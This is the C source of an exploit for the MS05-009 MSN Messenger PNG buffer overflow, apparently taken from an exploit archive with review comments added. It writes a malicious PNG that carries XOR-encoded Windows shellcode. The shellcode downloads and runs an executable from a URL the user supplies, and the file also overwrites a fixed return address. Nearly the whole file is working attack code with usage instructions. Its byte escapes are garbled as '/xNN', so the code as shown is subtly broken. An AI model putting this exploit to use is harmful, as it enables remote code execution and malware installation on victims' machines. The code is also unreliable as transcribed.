
ms05009.c

/*
* from xfocus
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discovered by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright (c) 2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/

/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>


#ifdef __BORLANDC__
#include <mem.h>
#endif

/* Filler byte written between the file header and the payload, and again
 * after it (see the padding loops in main). */
#define NOP 0x90

/* NOTE(review): throughout this listing every byte escape appears as "/xNN".
 * C reads that as four literal characters, not one byte, so the arrays as
 * transcribed on this page hold plain text; the page is an extraction
 * artifact of the original file and is not reviewed as compilable code. */

/* Leading bytes of the generated file.  Decoding the intended bytes: the
 * 8-byte PNG signature, a 13-byte IHDR chunk (64x64, bit depth 8, colour
 * type 3 = palette, CRC 9D B7 81 EC), then the length (0x000001B9) and
 * type ("tRNS") of the following chunk -- the chunk body itself is what
 * the rest of main() writes. */
char png_header[] =
"/x89/x50/x4E/x47/x0D/x0A/x1A/x0A/x00/x00/x00/x0D/x49/x48/x44/x52"
"/x00/x00/x00/x40/x00/x00/x00/x40/x08/x03/x00/x00/x00/x9D/xB7/x81"
"/xEC/x00/x00/x01/xB9/x74/x52/x4E/x53";

/* Trailing bytes written after the 4-byte return address in main(). */
char pngeof[] = "/x90/x90/x90/x59/xE8/x47/xFE/xFF/xFF";

/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
/* main() looks for the 2-byte sequence 0x22 0xFF inside this array with
 * strstr() and overwrites it with a 16-bit value derived from the URL
 * length, then appends the XOR-encoded URL and a 0x1d terminator. */
char shellcode[] = "/xEB"
"/x10/x58/x31/xC9/x66/x81/xE9/x22/xFF/x80/x30/x1D/x40/xE2/xFA/xEB/x05/xE8/xEB/xFF"
"/xFF/xFF/xF4/xD1/x1D/x1D/x1D/x42/xF5/x4B/x1D/x1D/x1D/x94/xDE/x4D/x75/x93/x53/x13"
"/xF1/xF5/x7D/x1D/x1D/x1D/x2C/xD4/x7B/xA4/x72/x73/x4C/x75/x68/x6F/x71/x70/x49/xE2"
"/xCD/x4D/x75/x2B/x07/x32/x6D/xF5/x5B/x1D/x1D/x1D/x2C/xD4/x4C/x4C/x90/x2A/x4B/x90"
"/x6A/x15/x4B/x4C/xE2/xCD/x4E/x75/x85/xE3/x97/x13/xF5/x30/x1D/x1D/x1D/x4C/x4A/xE2"
"/xCD/x2C/xD4/x54/xFF/xE3/x4E/x75/x63/xC5/xFF/x6E/xF5/x04/x1D/x1D/x1D/xE2/xCD/x48"
"/x4B/x79/xBC/x2D/x1D/x1D/x1D/x96/x5D/x11/x96/x6D/x01/xB0/x96/x75/x15/x94/xF5/x43"
"/x40/xDE/x4E/x48/x4B/x4A/x96/x71/x39/x05/x96/x58/x21/x96/x49/x18/x65/x1C/xF7/x96"
"/x57/x05/x96/x47/x3D/x1C/xF6/xFE/x28/x54/x96/x29/x96/x1C/xF3/x2C/xE2/xE1/x2C/xDD"
"/xB1/x25/xFD/x69/x1A/xDC/xD2/x10/x1C/xDA/xF6/xEF/x26/x61/x39/x09/x68/xFC/x96/x47"
"/x39/x1C/xF6/x7B/x96/x11/x56/x96/x47/x01/x1C/xF6/x96/x19/x96/x1C/xF5/xF4/x1F/x1D"
"/x1D/x1D/x2C/xDD/x94/xF7/x42/x43/x40/x46/xDE/xF5/x32/xE2/xE2/xE2/x70/x75/x75/x33"
"/x78/x65/x78/x1D";

FILE *di;             /* output file, opened "wb" in main() */
int i = 0;            /* file-scope loop index, shared by main() and Sifrele() */
short int weblength;  /* 16-bit value patched over the 0x22 0xFF marker */
char *web;            /* argv[2] (the URL); XOR-encoded in place by Sifrele() */
char *pointer = NULL; /* strstr() hit inside shellcode[]; not NULL-checked */
char *newshellcode;   /* shellcode + encoded URL + terminator; never freed */

/* In-place XOR "cipher": XORs every byte of the NUL-terminated string
 * Name1 with 0x1d and returns the same pointer.  The caller's buffer is
 * modified (main() passes argv[2]).  Uses the file-scope index i, which is
 * left equal to the string length when the function returns. */
char *Sifrele(char *Name1)
{
    const char key = 0x1d;
    int len = (int)strlen(Name1);
    for (i = 0; i < len; i++) {
        Name1[i] ^= key;
    }
    return Name1;
}


/*
 * Entry point: writes the crafted file to argv[1], embedding the URL given
 * as argv[2] in the payload.  Output layout, in order: png_header, 99
 * filler bytes, shellcode with the encoded URL appended, (83 - strlen(web))
 * filler bytes, a fixed 4-byte address, pngeof.
 *
 * NOTE(review): `void main` is non-standard and `new char[]` is C++, so the
 * original must have been built as C++ (the #ifdef __BORLANDC__ above
 * suggests Borland); this is not valid C.  Findings left unchanged here:
 *  - the strstr() result is passed to memcpy() without a NULL check;
 *  - the buffer obtained with `new` is never released;
 *  - the padding loop bound `83-strlen(web)` is size_t and wraps to a very
 *    large value when the URL is longer than 83 bytes;
 *  - argv[2] is XOR-encoded in place, and strlen(web) is later taken on the
 *    encoded bytes;
 *  - the "/n" and "/t" in the messages are not escape sequences as
 *    transcribed on this page (see the note above png_header).
 */
void main(int argc, char *argv[])
{

if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit/n");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)/n");
printf("Exploit coded By ATmaCA/n");
printf("Copyright ?002-2005 AtmacaSoft Inc. All Rights Reserved./n");
printf("Web: http://www.atmacasoft.com/n");
printf("E-Mail: atmaca@icqmail.com/n");
printf("Credit to kozan and delikon/n/n");
printf("/tUsage:exploit <OutputPath> <Url>/n");
printf("/tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe/n");

return;
}


web = argv[2]; /* points into argv; modified in place by Sifrele() below */


if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!/n");
return;
}
/* PNG signature, IHDR, and the length/type of the next chunk */
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);

/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);

/* Find the 0x22 0xFF marker in shellcode[] and overwrite it with a 16-bit
 * value derived from the URL length.  `pointer` is not checked for NULL
 * before the memcpy(). */
weblength=(short int)0xff22;
pointer=strstr(shellcode,"/x22/xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
/* C++ allocation; the buffer is never freed. */
newshellcode =new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web)); /* Sifrele() XORs argv[2] in place */
strcat(newshellcode,"/x1d");

//shell code
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);


/* web is already XOR-encoded here; (83-strlen(web)) is size_t and wraps
 * when the URL is longer than 83 bytes */
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);

/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
/* fixed address, written little-endian one byte at a time */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);

for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);

printf("Vulnarable png file %s has been generated!/n",argv[1]);

fclose(di); /* return value not checked; write errors go unreported */
}
